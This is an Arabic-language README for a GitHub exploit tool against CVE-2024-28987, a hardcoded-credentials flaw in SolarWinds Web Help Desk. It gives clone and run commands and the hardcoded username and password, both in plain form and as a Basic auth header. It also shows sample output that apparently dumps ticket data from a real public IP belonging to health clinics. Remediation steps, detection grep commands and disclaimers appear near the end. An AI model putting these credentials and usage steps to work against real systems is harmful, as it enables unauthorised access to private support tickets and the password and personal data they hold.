
**CVE-2024-28987** هي ثغرة حرجة في SolarWinds Web Help Desk (WHD) تسمح للمهاجمين عن بُعد بالوصول إلى معلومات التذاكر الحساسة باستخدام **بيانات اعتماد مضمّنة في الكود (hardcoded credentials)**. تحمل هذه الثغرة **درجة CVSS تبلغ 9.1 (حرجة)** ويتم استغلالها بنشاط في البيئات الواقعية.
⚠️ إخلاء المسؤولية: هذه الأداة مخصصة لأغراض الاختبار الأمني التعليمي والمصرح به فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. استخدم هذه الأداة فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.
CVE-2024-28987 هي ثغرة أمنية حرجة في SolarWinds Web Help Desk (WHD) تسمح للمهاجمين عن بُعد بالوصول إلى معلومات التذاكر الحساسة باستخدام بيانات اعتماد مضمّنة. هذه الثغرة لها درجة CVSS تبلغ 9.1 (حرجة) ويتم استغلالها بنشاط في الهجمات.
| الخاصية | القيمة |
|---|---|
| CVE ID | CVE-2024-28987 |
| درجة CVSS | 9.1 (حرجة) |
| CWE | CWE-798 (بيانات اعتماد مضمّنة) |
| المنتجات المتأثرة | SolarWinds Web Help Desk ≤ 12.8.3 Hotfix 1 |
| الإصدار المُصحّح | 12.8.3 Hotfix 2 |
| الاستغلال | يُستغل بنشاط في الهجمات |
| أُضيف إلى CISA KEV | 15 أكتوبر 2024 |
يمكن لمهاجم غير مُصادَق:
/OrionTickets# Clone the repository
git clone https://github.com/Darabium/CVE-2024-28987.git
cd CVE-2024-28987
# Make the script executable
Usage
bash
# With target URL as argument
python3 cve-2024-28987.py http://target-ip:port
# Interactive mode (will prompt for target)
python3 cve-2024-28987.py
# Example with a vulnerable target
python3 cve-2024-28987.py http://192.168.1.100:8098
📊 Output Example
bash
$ python3 cve-2024-28987.py http://138.94.193.65:8098
╔══════════════════════════════════════════════════════════════════╗
║ ║
║ ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██╗ ██╗███████╗ ║
║ ██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗██║ ██║██╔════╝ ║
║ ██║ ██║ ██║█████╗ █████╔╝██║██╔██║███████║█████╗ ║
║ ██║ ╚██╗ ██╔╝██╔══╝ ██╔═══╝ ████╔╝██║██╔══██║██╔══╝ ║
║ ╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝██║ ██║███████╗ ║
║ ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝ ║
║ ║
║ CVE-2024-28987 - SolarWinds Web Help Desk ║
║ Hardcoded Credentials Vulnerability ║
║ ║
╠══════════════════════════════════════════════════════════════════╣
║ GitHub: https://github.com/Darabium ║
╚══════════════════════════════════════════════════════════════════╝
[*] Checking http://****:**/helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/
[+] Target is VULNERABLE!
[+] Found 42 tickets
======================================================================
[📋] Ticket Preview (First 3 tickets)
======================================================================
Ticket #1
├── ID: 5690
├── Client: UBS Portao Vermelho
├── Status: Open
├── Detail: BOA TARDE ENCAMINHO SOLICITAÇÃO DE MATERIAIS DA ODONTO
Ticket #2
├── ID: 5691
├── Client: UBS Centro
├── Status: In Progress
├── Detail: ALCOOL 70% - Solicitação de material de limpeza
======================================================================
[🔐] Scanning for Sensitive Data
======================================================================
[!] Potential PASSWORD data found in ticket #5723
└── detail: Please reset my password for system access...
[?] Do you want to extract ALL tickets to file? [y/N]: y
[*] Saving to: 138_94_193_65_8098_tickets.json
[✓] Successfully saved 138_94_193_65_8098_tickets.json
[*] File size: 42,847 bytes
[*] Total tickets: 42
[*] Done!
GitHub: https://github.com/Darabium
📁 بنية الملفات
CVE-2024-28987/
├── cve-2024-28987.py # Main exploit script
├── README.md # This file
└── LICENSE # MIT License
ملفات الإخراج
عند استخراج التذاكر، يتم إنشاء الملفات التالية:
138_94_193_65_8098_tickets.json
***_tickets.jsonl 🔍 التفاصيل التقنية بيانات الاعتماد المضمّنة python USERNAME = "helpdeskIntegrationUser" PASSWORD = "dev-C4F8025E7" نقطة النهاية المتأثرة text /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ نموذج طلب HTTP http GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1 Host: vulnerable-target:8098 Authorization: Basic aGVscGRlc2tJbnRlZ3JhdGlvblVzZXI6ZGV2LUM0ZjgwMjVFNw== Content-Type: application/x-www-form-urlencoded 🛡️ المعالجة إجراءات فورية تحديث فوري إلى SolarWinds Web Help Desk الإصدار 12.8.3 Hotfix 2 أو أحدث
فحص السجلات بحثًا عن أي وصول مشبوه إلى نقطة النهاية /OrionTickets
مراقبة الوصول غير المصرح به إلى بيانات التذاكر
إعادة تعيين جميع بيانات الاعتماد التي قد تكون كُشفت في التذاكر
مراجعة جميع تذاكر الدعم بحثًا عن أي تسريب محتمل للبيانات
أوامر الكشف bash
grep -i "OrionTickets" /var/log/webhelpdesk/access.log
grep -i "helpdeskIntegrationUser" /var/log/webhelpdesk/access.log
cat /opt/WebHelpDesk/version.txt 🚨 تنبيه CISA KEV تمت إضافة هذه الثغرة إلى كتالوج CISA للثغرات المستغلة المعروفة (KEV). يتعين على المؤسسات تطبيق التصحيح قبل الموعد النهائي المحدد.
تاريخ الإضافة: 15 أكتوبر 2024
الإجراء المطلوب: تطبيق التحديثات وفقًا لتعليمات البائع
الموعد النهائي: 5 نوفمبر 2024 (21 يومًا)
📚 المراجع NVD CVE-2024-28987
كتالوج CISA KEV
استشارة أمان SolarWinds
PEP 668 - إدارة البيئة الخارجية
🤝 المساهمة المساهمات مرحب بها! لا تتردد في إرسال طلبات السحب (Pull Requests) أو فتح القضايا (Issues).
الإرشادات انسخ المستودع (Fork)
أنشئ فرع الميزة الخاص بك (git checkout -b feature/AmazingFeature)
قم بتثبيت تغييراتك (git commit -m 'Add some AmazingFeature')
ادفع الفرع إلى المستودع البعيد (git push origin feature/AmazingFeature)
افتح طلب سحب (Pull Request)
📝 الترخيص هذا المشروع مرخّص بموجب رخصة MIT - راجع ملف LICENSE للتفاصيل.
⚡ المؤلف Darabium - العمل الأولي - GitHub
⚠️ ملاحظات هامة هذه الأداة مخصصة لأغراض البحث الأمني والتعليم
لا تستخدمها على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها
المؤلف غير مسؤول عن أي إساءة استخدام لهذه الأداة
اتبع دائمًا ممارسات الإفصاح المسؤول
احترم قوانين الخصوصية وحماية البيانات في منطقتك
🌟 سجل النجوم إذا وجدت هذه الأداة مفيدة، يرجى منحها ⭐ على GitHub!
📞 الدعم افتح قضية (Issue) على GitHub للإبلاغ عن الأخطاء
للمخاوف الأمنية، يرجى التواصل مباشرة عبر GitHub
صُنعت بكل ❤️ من أجل Darabium